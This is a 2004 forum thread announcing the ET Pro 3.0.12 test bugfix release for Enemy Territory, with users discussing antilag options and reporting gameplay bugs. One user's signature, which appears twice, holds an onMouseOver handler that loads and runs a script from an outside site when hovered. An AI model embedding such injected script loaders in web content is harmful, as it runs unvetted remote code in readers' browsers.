ET Pro 3.0.12 testbugfix released

Official ET Pro announcements here...

Moderators: Forum moderators, developers

bani
Site Admin

ET Pro 3.0.12 testbugfix released

Post by bani »

The test bugfix release version 3.0.12 is now available.

The next full release version of etpro will be 3.1.0, following the new version numbering system

Please test it and post your feedback (good or bad) in this thread.

Most reported bugs from 3.0.11 fixed.
Clients may now pick their own individual antilag algorithm (none / etpro / etmain)
Last edited by bani on Fri Jul 09, 2004 12:55 pm, edited 1 time in total.
SwERvE

Re: ET Pro 3.0.12 testbugfix released

Post by SwERvE »

bani wrote:Clients may now pick their own individual antilag algorithm (none / etpro / etmain)
Is this in the menu or by command?
Lagger

Re: ET Pro 3.0.12 testbugfix released

Post by Lagger »

SwERvE wrote:
bani wrote:Clients may now pick their own individual antilag algorithm (none / etpro / etmain)
Is this in the menu or by command?
etmain antilag is only by console, the two other options are available in the menu.
=FF=im2good4u

Post by =FF=im2good4u »

it is in my new menu onlym y menu isnt in the code yet :D
Sif=RoK=

Post by Sif=RoK= »

sounds good :)

assuming no more bugs are found, how long before the official 3.1.0? :)

i'm really looking forward to actually being able to use the fixes since 3.0.1, since our ladder only runs official versions.
Noobie

Post by Noobie »

bugs:
+after having emptied all your ammo, when in scoped mode as sniper, you can no longer press the altkey to exit scoped mode
+zoom weapons (binocs/scoped weapons) are slugish. If you zoom in to the max and do no move the mouse, the auto-movement of the scope looks like it is doing 1 fps.
todd`

Post by todd` »

Noobie wrote:bugs:
+after having emptied all your ammo, when in scoped mode as sniper, you can no longer press the altkey to exit scoped mode
+zoom weapons (binocs/scoped weapons) are slugish. If you zoom in to the max and do no move the mouse, the auto-movement of the scope looks like it is doing 1 fps.
(1) indeed.
(2) it's fine for me.. not slow at all
Noobie

Post by Noobie »

todd` wrote:
(1) indeed.
(2) it's fine for me.. not slow at all
(1) So glad you have it too
(2) I went to several servers and it was fine there, however on ND80 Grotto my scope is all slugish. So it must be the settings there.
Rain

Post by Rain »

The second thing seems to be related to the same bug that makes shader animations (e.g. flames) jumpy/stop after the server has been up for a while.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
gotenks

Post by gotenks »

when your in limbo waiting to spawn you cannot see the stats screen (default alt) until about 5 secs till spawn
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
bani
Site Admin

Post by bani »

fixed in next release
Noobie

Post by Noobie »

Rain wrote:The second thing seems to be related to the same bug that makes shader animations (e.g. flames) jumpy/stop after the server has been up for a while.
Today on Grotto I noticed that on radar the big radar, the ones you have on battery too, moved very jerky too (so not the radars which hold the radar parts, but rather the big one's with that fence like thing on top, those massive gray things).
=FF=im2good4u

Post by =FF=im2good4u »

today i noticed that while tapped out and sort of specfolling my teamates i the "tab" scoreboard was empty
Rain

Post by Rain »

=FF=im2weak4u wrote:today i noticed that while tapped out and sort of specfolling my teamates i the "tab" scoreboard was empty
On 3.0.12?
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Insano

Post by Insano »

Rain wrote:
=FF=im2weak4u wrote:today i noticed that while tapped out and sort of specfolling my teamates i the "tab" scoreboard was empty
On 3.0.12?
i notice this bug in 3.0.10, i played a match yeasterday in 3.0.12 and seems ok now.
DarkSpiritz Clan .:. Co-leader - www.darkspiritz.org
Confederação Brasileira de Wolfenstein - Admin - www.cbwet.org